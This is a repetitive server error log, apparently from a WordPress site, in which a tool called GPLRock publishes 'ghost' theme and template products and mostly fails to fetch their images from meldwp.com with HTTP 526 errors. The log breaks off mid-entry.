[05-Apr-2026 15:59:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ninja-forms-unique-fields [05-Apr-2026 16:00:13 UTC] GPLRock: Image download failed for product artex-architecture-interior-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:00:15 UTC] GPLRock: Image download failed for product artex-architecture-interior-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:00:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/artex---architecture--interior-wordpress-theme-30327.webp for product artex-architecture-interior-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:00:18 UTC] GPLRock: Image download failed for product artex-architecture-interior-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:00:20 UTC] GPLRock: Image download failed for product artex-architecture-interior-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:00:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/artex---architecture--interior-wordpress-theme-30327.webp for product artex-architecture-interior-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:00:22 UTC] GPLRock WARNING: Image download failed for product artex-architecture-interior-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/artex---architecture--interior-wordpress-theme-30327.webp [05-Apr-2026 16:00:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: artex-architecture-interior-wordpress-theme [05-Apr-2026 16:00:22 UTC] GPLRock: Image download failed for product gleam-portfolio-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:00:24 UTC] GPLRock: Image download failed for product gleam-portfolio-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:00:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gleam---portfolio-photography-wordpress-theme-21515.webp for product gleam-portfolio-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:00:26 UTC] GPLRock: Image download failed for product gleam-portfolio-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:00:29 UTC] GPLRock: Image download failed for product gleam-portfolio-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:00:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gleam---portfolio-photography-wordpress-theme-21515.webp for product gleam-portfolio-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:00:31 UTC] GPLRock WARNING: Image download failed for product gleam-portfolio-photography-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gleam---portfolio-photography-wordpress-theme-21515.webp [05-Apr-2026 16:00:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gleam-portfolio-photography-wordpress-theme [05-Apr-2026 16:00:31 UTC] GPLRock: Image download failed for product agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:00:33 UTC] GPLRock: Image download failed for product agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:00:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agency-wordpress-theme-2058.webp for product agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:00:35 UTC] GPLRock: Image download failed for product agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:00:37 UTC] GPLRock: Image download failed for product agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:00:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agency-wordpress-theme-2058.webp for product agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:00:39 UTC] GPLRock WARNING: Image download failed for product agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/agency-wordpress-theme-2058.webp [05-Apr-2026 16:00:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: agency-wordpress-theme [05-Apr-2026 16:00:40 UTC] GPLRock: Image download failed for product harmini-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:00:42 UTC] GPLRock: Image download failed for product harmini-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:00:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/harmini---photography-wordpress-theme-17952.webp for product harmini-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:00:44 UTC] GPLRock: Image download failed for product harmini-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:00:46 UTC] GPLRock: Image download failed for product harmini-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:00:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/harmini---photography-wordpress-theme-17952.webp for product harmini-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:00:48 UTC] GPLRock WARNING: Image download failed for product harmini-photography-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/harmini---photography-wordpress-theme-17952.webp [05-Apr-2026 16:00:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: harmini-photography-wordpress-theme [05-Apr-2026 16:00:48 UTC] GPLRock: Image download failed for product friend-finder-social-network-html5-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:00:50 UTC] GPLRock: Image download failed for product friend-finder-social-network-html5-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:00:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/friend-finder---social-network-html5-template-28106.webp for product friend-finder-social-network-html5-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:00:53 UTC] GPLRock: Image download failed for product friend-finder-social-network-html5-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:00:55 UTC] GPLRock: Image download failed for product friend-finder-social-network-html5-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:00:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/friend-finder---social-network-html5-template-28106.webp for product friend-finder-social-network-html5-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:00:57 UTC] GPLRock WARNING: Image download failed for product friend-finder-social-network-html5-template. URL: https://meldwp.com/wp-content/uploads/friend-finder---social-network-html5-template-28106.webp [05-Apr-2026 16:00:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: friend-finder-social-network-html5-template [05-Apr-2026 16:00:57 UTC] GPLRock: Image download failed for product tourimo-tour-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:00:59 UTC] GPLRock: Image download failed for product tourimo-tour-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:01:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tourimo---tour-booking-wordpress-theme-23907.webp for product tourimo-tour-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:01:01 UTC] GPLRock: Image download failed for product tourimo-tour-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:01:03 UTC] GPLRock: Image download failed for product tourimo-tour-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:01:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tourimo---tour-booking-wordpress-theme-23907.webp for product tourimo-tour-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:01:05 UTC] GPLRock WARNING: Image download failed for product tourimo-tour-booking-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tourimo---tour-booking-wordpress-theme-23907.webp [05-Apr-2026 16:01:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tourimo-tour-booking-wordpress-theme [05-Apr-2026 16:01:06 UTC] GPLRock: Image download failed for product fundra-fundraising-donation-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:01:08 UTC] GPLRock: Image download failed for product fundra-fundraising-donation-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:01:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fundra--fundraising--donation-wordpress-theme-5666.webp for product fundra-fundraising-donation-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:01:10 UTC] GPLRock: Image download failed for product fundra-fundraising-donation-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:01:12 UTC] GPLRock: Image download failed for product fundra-fundraising-donation-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:01:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fundra--fundraising--donation-wordpress-theme-5666.webp for product fundra-fundraising-donation-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:01:14 UTC] GPLRock WARNING: Image download failed for product fundra-fundraising-donation-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fundra--fundraising--donation-wordpress-theme-5666.webp [05-Apr-2026 16:01:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fundra-fundraising-donation-wordpress-theme [05-Apr-2026 16:01:14 UTC] GPLRock: Image download failed for product hoom-news-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:01:16 UTC] GPLRock: Image download failed for product hoom-news-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:01:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hoom--news--magazine-wordpress-theme-23153.webp for product hoom-news-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:01:19 UTC] GPLRock: Image download failed for product hoom-news-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:01:21 UTC] GPLRock: Image download failed for product hoom-news-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:01:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hoom--news--magazine-wordpress-theme-23153.webp for product hoom-news-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:01:23 UTC] GPLRock WARNING: Image download failed for product hoom-news-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/hoom--news--magazine-wordpress-theme-23153.webp [05-Apr-2026 16:01:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hoom-news-magazine-wordpress-theme [05-Apr-2026 16:01:23 UTC] GPLRock: Image download failed for product azumi-elegant-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:01:25 UTC] GPLRock: Image download failed for product azumi-elegant-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:01:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/azumi---elegant-blog-theme-20173.webp for product azumi-elegant-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:01:27 UTC] GPLRock: Image download failed for product azumi-elegant-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:01:29 UTC] GPLRock: Image download failed for product azumi-elegant-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:01:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/azumi---elegant-blog-theme-20173.webp for product azumi-elegant-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:01:31 UTC] GPLRock WARNING: Image download failed for product azumi-elegant-blog-theme. URL: https://meldwp.com/wp-content/uploads/azumi---elegant-blog-theme-20173.webp [05-Apr-2026 16:01:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: azumi-elegant-blog-theme [05-Apr-2026 16:01:32 UTC] GPLRock: Image download failed for product rade-a-versatile-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:01:34 UTC] GPLRock: Image download failed for product rade-a-versatile-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:01:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rade---a-versatile-woocommerce-theme-21337.webp for product rade-a-versatile-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:01:36 UTC] GPLRock: Image download failed for product rade-a-versatile-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:01:38 UTC] GPLRock: Image download failed for product rade-a-versatile-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:01:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rade---a-versatile-woocommerce-theme-21337.webp for product rade-a-versatile-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:01:40 UTC] GPLRock WARNING: Image download failed for product rade-a-versatile-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/rade---a-versatile-woocommerce-theme-21337.webp [05-Apr-2026 16:01:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rade-a-versatile-woocommerce-theme [05-Apr-2026 16:02:16 UTC] GPLRock: Image download failed for product metronic-tailwind-bootstrap-react-nextjs-vue-angular-laravel-admin-dashboard-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:02:18 UTC] GPLRock: Image download failed for product metronic-tailwind-bootstrap-react-nextjs-vue-angular-laravel-admin-dashboard-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:02:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/metronic--tailwind-bootstrap-react-nextjs-vue-angular-laravel-admin-dashboard-ht-20013.webp for product metronic-tailwind-bootstrap-react-nextjs-vue-angular-laravel-admin-dashboard-html-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:02:20 UTC] GPLRock: Image download failed for product metronic-tailwind-bootstrap-react-nextjs-vue-angular-laravel-admin-dashboard-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:02:22 UTC] GPLRock: Image download failed for product metronic-tailwind-bootstrap-react-nextjs-vue-angular-laravel-admin-dashboard-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:02:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/metronic--tailwind-bootstrap-react-nextjs-vue-angular-laravel-admin-dashboard-ht-20013.webp for product metronic-tailwind-bootstrap-react-nextjs-vue-angular-laravel-admin-dashboard-html-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:02:24 UTC] GPLRock WARNING: Image download failed for product metronic-tailwind-bootstrap-react-nextjs-vue-angular-laravel-admin-dashboard-html-template. URL: https://meldwp.com/wp-content/uploads/metronic--tailwind-bootstrap-react-nextjs-vue-angular-laravel-admin-dashboard-ht-20013.webp [05-Apr-2026 16:02:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: metronic-tailwind-bootstrap-react-nextjs-vue-angular-laravel-admin-dashboard-html-template [05-Apr-2026 16:02:24 UTC] GPLRock: Image download failed for product goodresto-restaurant-wordpress-theme-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:02:26 UTC] GPLRock: Image download failed for product goodresto-restaurant-wordpress-theme-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:02:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/goodresto---restaurant-wordpress-theme--woocommerce-33437.webp for product goodresto-restaurant-wordpress-theme-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:02:29 UTC] GPLRock: Image download failed for product goodresto-restaurant-wordpress-theme-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:02:31 UTC] GPLRock: Image download failed for product goodresto-restaurant-wordpress-theme-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:02:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/goodresto---restaurant-wordpress-theme--woocommerce-33437.webp for product goodresto-restaurant-wordpress-theme-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:02:33 UTC] GPLRock WARNING: Image download failed for product goodresto-restaurant-wordpress-theme-woocommerce. URL: https://meldwp.com/wp-content/uploads/goodresto---restaurant-wordpress-theme--woocommerce-33437.webp [05-Apr-2026 16:02:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: goodresto-restaurant-wordpress-theme-woocommerce [05-Apr-2026 16:02:33 UTC] GPLRock: Image download failed for product truehost-responsive-hosting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:02:35 UTC] GPLRock: Image download failed for product truehost-responsive-hosting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:02:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/truehost---responsive-hosting-wordpress-theme-3524.webp for product truehost-responsive-hosting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:02:37 UTC] GPLRock: Image download failed for product truehost-responsive-hosting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:02:40 UTC] GPLRock: Image download failed for product truehost-responsive-hosting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:02:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/truehost---responsive-hosting-wordpress-theme-3524.webp for product truehost-responsive-hosting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:02:42 UTC] GPLRock WARNING: Image download failed for product truehost-responsive-hosting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/truehost---responsive-hosting-wordpress-theme-3524.webp [05-Apr-2026 16:02:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: truehost-responsive-hosting-wordpress-theme [05-Apr-2026 16:02:42 UTC] GPLRock: Image download failed for product weldlfe-wildlife-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:02:44 UTC] GPLRock: Image download failed for product weldlfe-wildlife-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:02:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/weldlfe---wildlife-wordpress-theme-9064.webp for product weldlfe-wildlife-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:02:46 UTC] GPLRock: Image download failed for product weldlfe-wildlife-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:02:48 UTC] GPLRock: Image download failed for product weldlfe-wildlife-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:02:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/weldlfe---wildlife-wordpress-theme-9064.webp for product weldlfe-wildlife-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:02:50 UTC] GPLRock WARNING: Image download failed for product weldlfe-wildlife-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/weldlfe---wildlife-wordpress-theme-9064.webp [05-Apr-2026 16:02:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: weldlfe-wildlife-wordpress-theme [05-Apr-2026 16:02:50 UTC] GPLRock: Image download failed for product folio-two-portfolio-for-creative-professionals (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:02:53 UTC] GPLRock: Image download failed for product folio-two-portfolio-for-creative-professionals (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:02:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/folio-two---portfolio-for-creative-professionals-24255.webp for product folio-two-portfolio-for-creative-professionals after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:02:55 UTC] GPLRock: Image download failed for product folio-two-portfolio-for-creative-professionals (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:02:57 UTC] GPLRock: Image download failed for product folio-two-portfolio-for-creative-professionals (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:02:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/folio-two---portfolio-for-creative-professionals-24255.webp for product folio-two-portfolio-for-creative-professionals after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:02:59 UTC] GPLRock WARNING: Image download failed for product folio-two-portfolio-for-creative-professionals. URL: https://meldwp.com/wp-content/uploads/folio-two---portfolio-for-creative-professionals-24255.webp [05-Apr-2026 16:02:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: folio-two-portfolio-for-creative-professionals [05-Apr-2026 16:02:59 UTC] GPLRock: Image download failed for product vulcan-minimalist-business-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:03:01 UTC] GPLRock: Image download failed for product vulcan-minimalist-business-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:03:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vulcan---minimalist-business-html-template-31827.webp for product vulcan-minimalist-business-html-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:03:03 UTC] GPLRock: Image download failed for product vulcan-minimalist-business-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:03:06 UTC] GPLRock: Image download failed for product vulcan-minimalist-business-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:03:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vulcan---minimalist-business-html-template-31827.webp for product vulcan-minimalist-business-html-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:03:08 UTC] GPLRock WARNING: Image download failed for product vulcan-minimalist-business-html-template. URL: https://meldwp.com/wp-content/uploads/vulcan---minimalist-business-html-template-31827.webp [05-Apr-2026 16:03:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vulcan-minimalist-business-html-template [05-Apr-2026 16:03:08 UTC] GPLRock: Image download failed for product gridlove-news-portal-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:03:10 UTC] GPLRock: Image download failed for product gridlove-news-portal-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:03:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gridlove---news-portal--magazine-wordpress-theme-14152.webp for product gridlove-news-portal-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:03:12 UTC] GPLRock: Image download failed for product gridlove-news-portal-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:03:14 UTC] GPLRock: Image download failed for product gridlove-news-portal-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:03:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gridlove---news-portal--magazine-wordpress-theme-14152.webp for product gridlove-news-portal-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:03:16 UTC] GPLRock WARNING: Image download failed for product gridlove-news-portal-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gridlove---news-portal--magazine-wordpress-theme-14152.webp [05-Apr-2026 16:03:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gridlove-news-portal-magazine-wordpress-theme [05-Apr-2026 16:03:17 UTC] GPLRock: Image downloaded successfully for product soleng-solar-energy-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7acbaeb2.webp [05-Apr-2026 16:03:17 UTC] GPLRock: Using pre-downloaded image for product soleng-solar-energy-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7acbaeb2.webp [05-Apr-2026 16:03:17 UTC] GPLRock: Ghost product published with image - Product ID: soleng-solar-energy-wordpress-theme [05-Apr-2026 16:03:17 UTC] GPLRock: Image download failed for product jupi-product-landing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:03:19 UTC] GPLRock: Image download failed for product jupi-product-landing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:03:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jupi---product-landing-wordpress-theme-31071.webp for product jupi-product-landing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:03:21 UTC] GPLRock: Image download failed for product jupi-product-landing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:03:23 UTC] GPLRock: Image download failed for product jupi-product-landing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:03:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jupi---product-landing-wordpress-theme-31071.webp for product jupi-product-landing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:03:25 UTC] GPLRock WARNING: Image download failed for product jupi-product-landing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/jupi---product-landing-wordpress-theme-31071.webp [05-Apr-2026 16:03:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jupi-product-landing-wordpress-theme [05-Apr-2026 16:03:25 UTC] GPLRock: Image download failed for product glossier-newspaper-viral-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:03:28 UTC] GPLRock: Image download failed for product glossier-newspaper-viral-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:03:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/glossier---newspaper--viral-magazine-wordpress-theme-1808.webp for product glossier-newspaper-viral-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:03:30 UTC] GPLRock: Image download failed for product glossier-newspaper-viral-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:03:32 UTC] GPLRock: Image download failed for product glossier-newspaper-viral-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:03:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/glossier---newspaper--viral-magazine-wordpress-theme-1808.webp for product glossier-newspaper-viral-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:03:34 UTC] GPLRock WARNING: Image download failed for product glossier-newspaper-viral-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/glossier---newspaper--viral-magazine-wordpress-theme-1808.webp [05-Apr-2026 16:03:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: glossier-newspaper-viral-magazine-wordpress-theme [05-Apr-2026 16:03:54 UTC] GPLRock: Image download failed for product harvest-wp-multipurpose-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:03:56 UTC] GPLRock: Image download failed for product harvest-wp-multipurpose-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:03:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/harvest-wp---multipurpose-elementor-woocommerce-theme-16592.webp for product harvest-wp-multipurpose-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:03:58 UTC] GPLRock: Image download failed for product harvest-wp-multipurpose-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:01 UTC] GPLRock: Image download failed for product harvest-wp-multipurpose-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/harvest-wp---multipurpose-elementor-woocommerce-theme-16592.webp for product harvest-wp-multipurpose-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:04:03 UTC] GPLRock WARNING: Image download failed for product harvest-wp-multipurpose-elementor-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/harvest-wp---multipurpose-elementor-woocommerce-theme-16592.webp [05-Apr-2026 16:04:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: harvest-wp-multipurpose-elementor-woocommerce-theme [05-Apr-2026 16:04:03 UTC] GPLRock: Image download failed for product 